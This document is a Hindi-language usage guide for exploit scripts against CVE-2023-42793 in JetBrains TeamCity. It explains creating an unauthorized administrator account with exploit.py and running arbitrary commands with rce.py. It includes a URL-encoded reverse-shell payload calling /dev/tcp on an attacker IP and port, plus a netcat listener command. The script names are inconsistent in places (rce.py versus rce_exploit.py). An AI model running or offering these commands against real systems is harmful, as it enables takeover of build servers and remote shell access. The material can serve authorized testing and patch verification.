
JetBrains TeamCity 2023.05.3 - रिमोट कोड एक्ज़ीक्यूशन (RCE), CVE-2023-42793
पहले
exploit.pyका उपयोग करके आपके लिए एक व्यवस्थापक खाता बनाएं, फिर लक्ष्य पर कमांड निष्पादित करने के लिएrce.pyका उपयोग करें, और रिवर्स शेल के लिए यह देखें
यह स्क्रिप्ट CVE-2023-42793 का उपयोग करके TeamCity सर्वर पर एक व्यवस्थापक खाता बनाती है। यह लक्ष्य URL पर एक POST अनुरोध भेजकर निर्दिष्ट या यादृच्छिक क्रेडेंशियल्स के साथ एक व्यवस्थापक उपयोगकर्ता बनाती है।
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL: लक्ष्य URL (आवश्यक)-v, --verbose: विस्तृत मोड सक्षम करें-n, --username USERNAME: उपयोगकर्ता नाम निर्दिष्ट करें (डिफ़ॉल्ट: यादृच्छिक)-p, --password PASSWORD: पासवर्ड निर्दिष्ट करें (डिफ़ॉल्ट: यादृच्छिक)-e, --email EMAIL: ईमेल निर्दिष्ट करें (डिफ़ॉल्ट: यादृच्छिक)-t, --token-file: टोकन को सहेजने के लिए फ़ाइलpip3 install -r requirements.txtयादृच्छिक उपयोगकर्ता नाम, पासवर्ड और ईमेल के साथ एक्सप्लॉइट करें:
python exploit.py -u http://target.com
निर्दिष्ट उपयोगकर्ता नाम, पासवर्ड और ईमेल के साथ एक्सप्लॉइट करें:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
सफल एक्सप्लॉइटेशन पर, स्क्रिप्ट बनाए गए व्यवस्थापक खाते का URL, उपयोगकर्ता नाम और पासवर्ड प्रिंट करती है, फिर आउटपुट को टोकन फ़ाइल में सहेजती है।
यह स्क्रिप्ट CVE-2023-42793 का उपयोग करके एक कमजोर TeamCity सर्वर पर कमांड निष्पादित करने की अनुमति देती है। यह पहले डीबग प्रक्रियाओं को सक्षम करती है और फिर उपयुक्त API एंडपॉइंट्स का उपयोग करके निर्दिष्ट कमांड को निष्पादित करती है।
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL : लक्ष्य URL (आवश्यक)-t, --token-file : टोकन वाली फ़ाइल निर्दिष्ट करने के लिए-c, --command COMMAND: निष्पादित करने के लिए कमांड निर्दिष्ट करें (RCE)-P, --port PORT: पोर्ट निर्दिष्ट करें (डिफ़ॉल्ट 80 है)निर्दिष्ट कमांड के साथ एक्सप्लॉइट करें:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555 का उपयोग करके एक लिसनर बनाएं